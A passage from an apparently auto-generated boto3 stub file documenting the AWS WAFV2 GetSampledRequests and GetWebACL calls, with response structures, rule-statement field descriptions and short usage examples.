:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type TimeWindow: dict
:param TimeWindow: [REQUIRED]\nThe start date and time and the end date and time of the range for which you want GetSampledRequests to return a sample of requests. Specify the date and time in the following format: '2016-09-27T14:50Z' . You can specify any time range in the previous three hours.\n\nStartTime (datetime) -- [REQUIRED]The beginning of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: '2016-09-27T14:50Z' . You can specify any time range in the previous three hours.\n\nEndTime (datetime) -- [REQUIRED]The end of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: '2016-09-27T14:50Z' . You can specify any time range in the previous three hours.\n\n\n
:type MaxItems: integer
:param MaxItems: [REQUIRED]\nThe number of requests that you want AWS WAF to return from among the first 5,000 requests that your AWS resource received during the time range. If your resource received fewer requests than the value of MaxItems , GetSampledRequests returns information about all of them.\n
:rtype: dict
ReturnsResponse Syntax
{
'SampledRequests': [
{
'Request': {
'ClientIP': 'string',
'Country': 'string',
'URI': 'string',
'Method': 'string',
'HTTPVersion': 'string',
'Headers': [
{
'Name': 'string',
'Value': 'string'
},
]
},
'Weight': 123,
'Timestamp': datetime(2015, 1, 1),
'Action': 'string',
'RuleNameWithinRuleGroup': 'string'
},
],
'PopulationSize': 123,
'TimeWindow': {
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
}
}
Response Structure
(dict) --
SampledRequests (list) --
A complex type that contains detailed information about each of the requests in the sample.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Represents a single sampled web request. The response from GetSampledRequests includes a SampledHTTPRequests complex type that appears as SampledRequests in the response syntax. SampledHTTPRequests contains an array of SampledHTTPRequest objects.
Request (dict) --
A complex type that contains detailed information about the request.
ClientIP (string) --
The IP address that the request originated from. If the web ACL is associated with a CloudFront distribution, this is the value of one of the following fields in CloudFront access logs:
c-ip , if the viewer did not use an HTTP proxy or a load balancer to send the request
x-forwarded-for , if the viewer did use an HTTP proxy or a load balancer to send the request
Country (string) --
The two-letter country code for the country that the request originated from. For a current list of country codes, see the Wikipedia entry ISO 3166-1 alpha-2 .
URI (string) --
The URI path of the request, which identifies the resource, for example, /images/daily-ad.jpg .
Method (string) --
The HTTP method specified in the sampled web request.
HTTPVersion (string) --
The HTTP version specified in the sampled web request, for example, HTTP/1.1 .
Headers (list) --
A complex type that contains the name and value for each header in the sampled web request.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Part of the response from GetSampledRequests . This is a complex type that appears as Headers in the response syntax. HTTPHeader contains the names and values of all of the headers that appear in one of the web requests.
Name (string) --
The name of the HTTP header.
Value (string) --
The value of the HTTP header.
Weight (integer) --
A value that indicates how one result in the response relates proportionally to other results in the response. For example, a result that has a weight of 2 represents roughly twice as many web requests as a result that has a weight of 1 .
Timestamp (datetime) --
The time at which AWS WAF received the request from your AWS resource, in Unix time format (in seconds).
Action (string) --
The action for the Rule that the request matched: ALLOW , BLOCK , or COUNT .
RuleNameWithinRuleGroup (string) --
The name of the Rule that the request matched. For managed rule groups, the format for this name is <vendor name>#<managed rule group name>#<rule name> . For your own rule groups, the format for this name is <rule group name>#<rule name> . If the rule is not in a rule group, the format is <rule name> .
PopulationSize (integer) --
The total number of requests from which GetSampledRequests got a sample of MaxItems requests. If PopulationSize is less than MaxItems , the sample includes every request that your AWS resource received during the specified time range.
TimeWindow (dict) --
Usually, TimeWindow is the time range that you specified in the GetSampledRequests request. However, if your AWS resource received more than 5,000 requests during the time range that you specified in the request, GetSampledRequests returns the time range for the first 5,000 requests.
StartTime (datetime) --
The beginning of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: "2016-09-27T14:50Z" . You can specify any time range in the previous three hours.
EndTime (datetime) --
The end of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: "2016-09-27T14:50Z" . You can specify any time range in the previous three hours.
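A usage sketch, with a hypothetical web ACL ARN and metric name, sampling the past hour (any window within the previous three hours is valid):
from datetime import datetime, timedelta, timezone

import boto3

client = boto3.client('wafv2', region_name='us-east-1')
now = datetime.now(timezone.utc)

response = client.get_sampled_requests(
    WebAclArn='arn:aws:wafv2:us-east-1:123456789012:regional/webacl/example/abc123',  # hypothetical
    RuleMetricName='exampleRuleMetric',  # hypothetical metric name
    Scope='REGIONAL',
    TimeWindow={'StartTime': now - timedelta(hours=1), 'EndTime': now},
    MaxItems=100,
)
for sampled in response['SampledRequests']:
    print(sampled['Request']['ClientIP'], sampled['Action'])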
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
:return: {
'SampledRequests': [
{
'Request': {
'ClientIP': 'string',
'Country': 'string',
'URI': 'string',
'Method': 'string',
'HTTPVersion': 'string',
'Headers': [
{
'Name': 'string',
'Value': 'string'
},
]
},
'Weight': 123,
'Timestamp': datetime(2015, 1, 1),
'Action': 'string',
'RuleNameWithinRuleGroup': 'string'
},
],
'PopulationSize': 123,
'TimeWindow': {
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
}
}
:returns:
c-ip , if the viewer did not use an HTTP proxy or a load balancer to send the request
x-forwarded-for , if the viewer did use an HTTP proxy or a load balancer to send the request
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def get_web_acl(Name=None, Scope=None, Id=None):
"""
Retrieves the specified WebACL .
See also: AWS API Documentation
Exceptions
:example: response = client.get_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
},
'LockToken': 'string'
}
Response Structure
(dict) --
WebACL (dict) --
The Web ACL specification. You can modify the settings in this Web ACL and use it to update this Web ACL or create a new one.
Name (string) --
The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --
A unique identifier for the WebACL . This ID is returned in the responses to create and list commands. You use this ID to do things like get, update, and delete a WebACL .
ARN (string) --
The Amazon Resource Name (ARN) of the Web ACL that you want to associate with the resource.
DefaultAction (dict) --
The action to perform if none of the Rules contained in the WebACL match.
Block (dict) --
Specifies that AWS WAF should block requests by default.
Allow (dict) --
Specifies that AWS WAF should allow requests by default.
Description (string) --
A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
Rules (list) --
The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
Name (string) --
The name of the rule. You can't change the name of a Rule after you create it.
Priority (integer) --
If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don't need to be consecutive, but they must all be different.
Statement (dict) --
The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .
ByteMatchStatement (dict) --
A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is referred to as a string match statement.
SearchString (bytes) --
A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.
Valid values depend on the component that you specify for inspection in FieldToMatch :
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
If SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.
If you're using the AWS WAF API
Specify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.
For example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .
If you're using the AWS CLI or one of the AWS SDKs
The value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.
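To illustrate the two paths described above (variable names are hypothetical):
import base64

# Raw API / CLI path: base64-encode the value yourself.
encoded = base64.b64encode(b'BadBot')
assert encoded == b'QmFkQm90'  # matches the example above

# boto3 path: pass the raw bytes and let the SDK encode them.
search_string = b'BadBot'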
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
PositionalConstraint (string) --
The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:
CONTAINS
The specified part of the web request must include the value of SearchString , but the location doesn't matter.
CONTAINS_WORD
The specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:
SearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .
SearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .
EXACTLY
The value of the specified part of the web request must exactly match the value of SearchString .
STARTS_WITH
The value of SearchString must appear at the beginning of the specified part of the web request.
ENDS_WITH
The value of SearchString must appear at the end of the specified part of the web request.
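Pulling these fields together, a sketch of a ByteMatchStatement that looks for the whole word badbot in the lowercased User-Agent header:
byte_match_statement = {
    'ByteMatchStatement': {
        'SearchString': b'badbot',  # lowercase, since LOWERCASE is applied before matching
        'FieldToMatch': {'SingleHeader': {'Name': 'user-agent'}},
        'TextTransformations': [{'Priority': 0, 'Type': 'LOWERCASE'}],
        'PositionalConstraint': 'CONTAINS_WORD',
    }
}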
SqliMatchStatement (dict) --
Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
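As a minimal sketch (illustrative priorities only), a TextTransformations list that URL-decodes the inspected component and then lowercases it before matching could look like this; the priority values are arbitrary as long as they differ:
text_transformations = [
    {'Priority': 0, 'Type': 'URL_DECODE'},  # applied first (lowest priority value)
    {'Priority': 10, 'Type': 'LOWERCASE'},  # applied second
]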
XssMatchStatement (dict) --
A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-side scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
SizeConstraintStatement (dict) --
A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.
If you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.
If you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.
FieldToMatch (dict) --
